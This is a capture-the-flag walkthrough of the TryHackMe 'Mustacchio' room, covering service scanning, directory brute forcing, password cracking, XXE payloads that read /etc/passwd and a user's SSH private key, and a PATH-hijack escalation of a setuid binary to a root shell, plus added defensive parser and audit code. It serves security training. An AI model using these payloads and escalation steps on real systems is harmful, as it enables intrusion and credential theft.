Mustacchio — TryHackMe

https://tryhackme.com/room/mustacchio

Summary

Another easy boot2root room. We first needed to enumerate a bit to find out what was running, and then used directory brute forcing to find a sqlite3 DB dump, which gave us the admin password. Using that password we logged in to the admin portal, where there was an XXE vulnerability that we exploited to get the user’s encrypted SSH key, which was cracked with ssh2john. Privesc involved exploiting a SUID binary.

This room is available here: https://tryhackme.com/room/mustacchio

So as usual let’s start enumerating the machine with nmap:

NMAP

# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.202.187

PORT     STATE SERVICE
22/tcp open ssh
80/tcp open http
8765/tcp open ultraseek-https

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p22,80,8765 10.10.202.187

PORT     STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 58:1b:0c:0f:fa:cf:05:be:4c:c0:7a:f1:f1:88:61:1c (RSA)
| 256 3c:fc:e8:a3:7e:03:9a:30:2c:77:e0:0a:1c:e4:52:e6 (ECDSA)
|_ 256 9d:59:c6:c7:79:c5:54:c4:1d:aa:e4:d1:84:71:01:92 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Mustacchio | Home
8765/tcp open http nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login

So, we have SSH port open and 2 web server ports open. Let’s use FFUF to check if any useful directory is exposed:

FFUF

# Perform directory brute forcing using ffuf
⇒ ffuf -u http://10.10.202.187/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -c

        /'___\  /'___\           /'___\       
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://10.10.202.187/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
custom [Status: 301, Size: 315, Words: 20, Lines: 10]
images [Status: 301, Size: 315, Words: 20, Lines: 10]
fonts [Status: 301, Size: 314, Words: 20, Lines: 10]
[Status: 200, Size: 1752, Words: 77, Lines: 73]
server-status [Status: 403, Size: 278, Words: 20, Lines: 10]
:: Progress: [220546/220546] :: Job [1/1] :: 1957 req/sec :: Duration: [0:02:17] :: Errors: 0 ::

We can see a directory called “custom” is there. Let’s explore it:

custom dir

Users.bak

Users.bak looks to be a database dump:

user.bak

Exploring it with sqlitebrowser gives us a user ‘admin’ and a hashed password:

sqlitebrowser

The hash is easily cracked at https://crackstation.net/ :

crackstation

Admin Portal

There was one more web port open, which nmap had told us about earlier. Accessing it at port 8765 gives us an admin login portal:

admin portal

Using the admin user and password found above, we are able to log in. Also, just clicking the submit button gives us a pop-up: Insert XML code!

admin portal

Also capture this request in Burp Suite:

captured BURP request

Few things are revealed here:

Checking auth/dontforget.bak indeed gave us an example XML request:

kali@kali:~$ cat /tmp/dontforget.bak 
<?xml version="1.0" encoding="UTF-8"?>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>his paragraph was a waste of time and space....</com>
</comment>

From this it is pretty clear that we have an XXE vulnerability here and that we need to exploit it to get our first flag.

XXE Payload

Found some useful XXE payloads here :

https://github.com/payloadbox/xxe-injection-payload-list

Combining the XML request and the payloads, here is a POC which gave us the password file:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<comment>
<name>&ent;</name>
<author>Barry Clad</author>
<com>Hiiii</com>
</comment>
able to read passwd file

So we can use this POC to read the user Barry’s Private SSH key:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///home/barry/.ssh/id_rsa"> ]>
<comment>
<name>&ent;</name>
<author>Barry Clad</author>
<com>Hiiii</com>
</comment>
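A hardened parser for the comment format above, as an added example (not code from the write-up or from the room's application): it uses Python's standard-library expat bindings and refuses any document carrying a DOCTYPE or entity declaration, so the PoC is rejected before any entity is resolved. The function and constant names are assumptions for illustration, and Python stands in for whatever the portal actually runs.

```python
import xml.parsers.expat

class DTDForbidden(ValueError):
    """Raised when a submitted document carries a DOCTYPE or entity declaration."""

FIELDS = ("name", "author", "com")  # child elements of <comment> seen on the page

def parse_comment(xml_text):
    """Return the comment fields, refusing any document that declares a DTD."""
    parser = xml.parsers.expat.ParserCreate()
    fields, stack, buf = {}, [], []

    def forbid(*_args):
        # Fires on <!DOCTYPE ...> and <!ENTITY ...>; raising aborts Parse().
        raise DTDForbidden("DOCTYPE/ENTITY declarations are not accepted")

    def start(tag, _attrs):
        stack.append(tag)
        buf.clear()

    def chars(data):
        buf.append(data)  # expat may deliver one text node in several chunks

    def end(tag):
        # Only direct children of <comment> are collected.
        if len(stack) == 2 and stack[0] == "comment" and tag in FIELDS:
            fields[tag] = "".join(buf)
        stack.pop()

    parser.StartDoctypeDeclHandler = forbid
    parser.EntityDeclHandler = forbid
    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = end
    parser.Parse(xml_text.encode("utf-8"), True)
    return fields

def is_rejected(xml_text):
    """True when the parser refused the document because of a DTD."""
    try:
        parse_comment(xml_text)
    except DTDForbidden:
        return True
    return False

# Constructed inputs modelled on the sample request and the PoC shown above.
BENIGN = ('<?xml version="1.0" encoding="UTF-8"?><comment><name>Joe Hamd</name>'
          '<author>Barry Clad</author><com>Hiiii</com></comment>')
POC = BENIGN.replace('<comment>', '<!DOCTYPE replace [<!ENTITY ent SYSTEM '
                     '"file:///etc/passwd"> ]><comment>').replace('Joe Hamd', '&ent;')
```

Rejecting the DOCTYPE outright also blocks internal-entity expansion, which the comment format never needs.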

We got the private key for the user Barry but the key is encrypted. Let’s use ssh2john and john to decrypt the key:

python /opt/tools/ssh2john.py id_rsa > id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
ssh key decrypted using ssh2john

User Flag

So we now have the SSH key for user Barry along with the passphrase for that SSH key. Change the permissions on the SSH key to 600 and then log in using the following command:

ssh using private key

User.txt was in the user Barry’s home dir:

user’s flag

Privilege Escalation

Running the Linux Smart Enumeration script, we found an uncommon setuid binary:

lse.sh found setuid binary

This is that binary, with the setuid bit set and owned by root:

binary owned by root

Let’s analyze this binary using strings :

This binary looks to be an Nginx log reader. It uses the tail command to read access.log, but calls it without the full path, so the program that actually runs is whichever “tail” is found first in PATH. We can exploit that by putting our own “tail” binary earlier in PATH and using it for privilege escalation. First we need to change the PATH variable so that our binary is executed first:

barry@mustacchio:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
barry@mustacchio:~$ PATH=/home/barry:$PATH
barry@mustacchio:~$ echo $PATH
/home/barry:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

Then let’s make a new file in /home/barry named tail :

barry@mustacchio:~$ cat tail 
/bin/bash
barry@mustacchio:~$ chmod +x tail
barry@mustacchio:~$

Now execute the suid binary /home/joe/live_log :

root.txt

/bin/bash was executed as root and we got the root shell and then the root flag. Game over!
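An audit helper for the flaw described above, as an added example rather than anything from the write-up or from lse.sh: it extracts printable strings from a setuid file and flags embedded command lines whose program name has no directory part. The utility list, function names and sample bytes (including the log path) are constructed for illustration.

```python
import os
import re
import stat

# Assumption: a short list of utilities worth flagging; extend it for your fleet.
COMMON_UTILS = {"tail", "cat", "ls", "cp", "mv", "rm", "sh", "bash", "grep",
                "chmod", "chown", "tar", "curl", "wget", "service", "id"}
PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")  # same idea as strings(1)

def relative_commands(blob):
    """Return embedded command lines whose program name has no directory part."""
    hits = []
    for match in PRINTABLE.finditer(blob):
        text = match.group().decode("ascii")
        words = text.split()
        # Heuristic: a known utility followed by arguments, named without a path.
        if len(words) > 1 and "/" not in words[0] and words[0] in COMMON_UTILS:
            hits.append(text)
    return hits

def audit_setuid(path):
    """Return flagged strings for a setuid regular file, or [] otherwise."""
    st = os.stat(path)
    if not (stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID):
        return []
    with open(path, "rb") as fh:
        return relative_commands(fh.read())

# Constructed bytes standing in for a setuid log reader; not the room's binary.
SAMPLE = (b"\x7fELF\x02\x01\x01\x00"
          b"Live Nginx Log Reader\x00"
          b"tail -f /var/log/nginx/access.log\x00"   # relative name: flagged
          b"/usr/bin/tail -n 5 /var/log/syslog\x00"  # absolute path: not flagged
          b"\x01\x02GLIBC_2.2.5\x00")

if __name__ == "__main__":
    for line in relative_commands(SAMPLE):
        print("relative command in setuid binary:", line)
```

A flagged binary should invoke the program by absolute path (for example /usr/bin/tail) and not depend on the caller's PATH.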

That’s it for this room. Thanks for reading.


Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

0xsanz
